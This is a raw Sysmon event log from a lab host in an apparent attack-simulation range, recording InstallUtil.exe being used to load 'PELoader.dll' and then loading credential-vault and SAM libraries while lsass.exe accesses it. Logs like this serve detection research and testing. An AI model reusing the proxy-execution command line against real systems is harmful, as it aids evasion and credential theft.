734700x800000000000000057679014Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057679013Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057679012Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057679011Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057679010Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057679009Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057679008Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057679007Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057679006Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057679005Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057679004Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-A829-618E-48FD-04000000F101}28766048C:\Windows\system32\conhost.exe{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057679003Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057679002Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057679001Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.777{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057679000Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.761{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057678999Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.761{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057678998Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.761{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057678997Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.761{8B6011A9-A828-618E-47FD-04000000F101}3756712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4ce006b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41634c4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41630ff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4c2b42d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4120071(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4183ae3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165af2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165af2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165983(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41566a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4163be5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4163757(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41634c4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41630ff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4c2b42d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41483aa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+414791c(wow64) 154100x800000000000000057678996Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:00.774{8B6011A9-BF50-618E-0700-05000000F101}7696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /LogToConsole=false PELoader.dllC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-A828-618E-47FD-04000000F101}3756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 734700x800000000000000057679247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.933{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\WinTypes.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Base Types DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWinTypes.dllMD5=9F209F29ABFF007F55328BCC36367005,SHA256=7F2CBE9B349062DFD782032D50C335E6C292EC5F509746941982A7161F24ED84trueMicrosoft WindowsValid 734700x800000000000000057679246Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.933{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vaultcli.dll10.0.14393.4169 (rs1_release.210107-1130)Credential Vault Client LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationvaultcli.dllMD5=3A4413FEB384CA47420B1A7CB9099BF0,SHA256=338D718FF68D1ACF8AFC366E923B44128E821DDD50A9C282A5F55502BAF288FAtrueMicrosoft WindowsValid 10341000x800000000000000057679245Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.933{8B6011A9-886B-6164-0B00-00000000F101}6488692C:\Windows\system32\lsass.exe{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057679244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.933{8B6011A9-886B-6164-0B00-00000000F101}6488692C:\Windows\system32\lsass.exe{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057679243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.933{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntasn1.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft ASN.1 APIMicrosoft® Windows® Operating SystemMicrosoft Corporationntasn1.dllMD5=A45B23E8D2623CE3F760377766AF3E24,SHA256=E0A8F5055CD9E2AF029B8537E09EFFAF1F46C724CB720A6395DCF563EF70B843trueMicrosoft WindowsValid 734700x800000000000000057679242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.933{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ncrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows NCrypt RouterMicrosoft® Windows® Operating SystemMicrosoft Corporationncrypt.dllMD5=025DBE9D0F7AE719C64DE3A4555A7C0A,SHA256=1A223828A444E7797A9E00632DAE81AC3AC68B38786E67912B1C3FC6118FB6B4trueMicrosoft WindowsValid 734700x800000000000000057679239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.839{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057679238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.839{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\samlib.dll10.0.14393.4530 (rs1_release.210705-0736)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=92CD5DA45ABA4CE45313783FCB345D99,SHA256=B0F20BE2B144056E488F8FF51E266F426625E64E3C91CCD17895A441A0935C46trueMicrosoft WindowsValid 734700x800000000000000057679237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.808{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057679236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.808{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdsapi.dll10.0.14393.0 (rs1_release.160715-1616)Active Directory Domain Services APIMicrosoft® Windows® Operating SystemMicrosoft Corporationntdsapi.dllMD5=01AD803D409DC3C6582A9C519EB4B014,SHA256=C5A0873EC1223A67CE5980BB62F176FDF2E61BB54081CE004F479629413F27AAtrueMicrosoft WindowsValid 734700x800000000000000057679235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.808{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\logoncli.dll10.0.14393.3808 (rs1_release.200707-2105)Net Logon Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationLOGONCLI.DLLMD5=B5C16F0A457DB3C7695AAC9EE7E3EE1E,SHA256=88764349C57E619C6D1253BB2F4AFB27DBD141E9EB9C12D445C20F7384A4F437trueMicrosoft WindowsValid 734700x800000000000000057679232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.792{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057679231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.777{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AAtrueMicrosoft WindowsValid 734700x800000000000000057679230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.777{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000057679229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.777{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000057679180Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.714{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Servd1dec626#\367b724a8a8d7a8816e8029637e9af91\System.ServiceModel.Internals.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.ServiceModel.Internals.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.ServiceModel.Internals.dllMD5=D9D712B2F98C74C18C71B40FBFF12C72,SHA256=C1CB9C1223FFBBFA879B7972A34AD437C308829152CFF855802A6350C75B46A7false-Unavailable 734700x800000000000000057679177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.698{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\SMDiagnostics\32788288a07982cb10ab4196907ef578\SMDiagnostics.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSMDiagnostics.dllMicrosoft® .NET FrameworkMicrosoft CorporationSMDiagnostics.dllMD5=6520C012D5164F22C0A4F96E82F7979A,SHA256=BD1F07E923DBA63862A75A4D312268EFF3391C155C1103B20964DF8F7E21D5C1false-Unavailable 734700x800000000000000057679176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.698{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057679175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.698{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057679173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.698{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057679167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.683{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057679166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 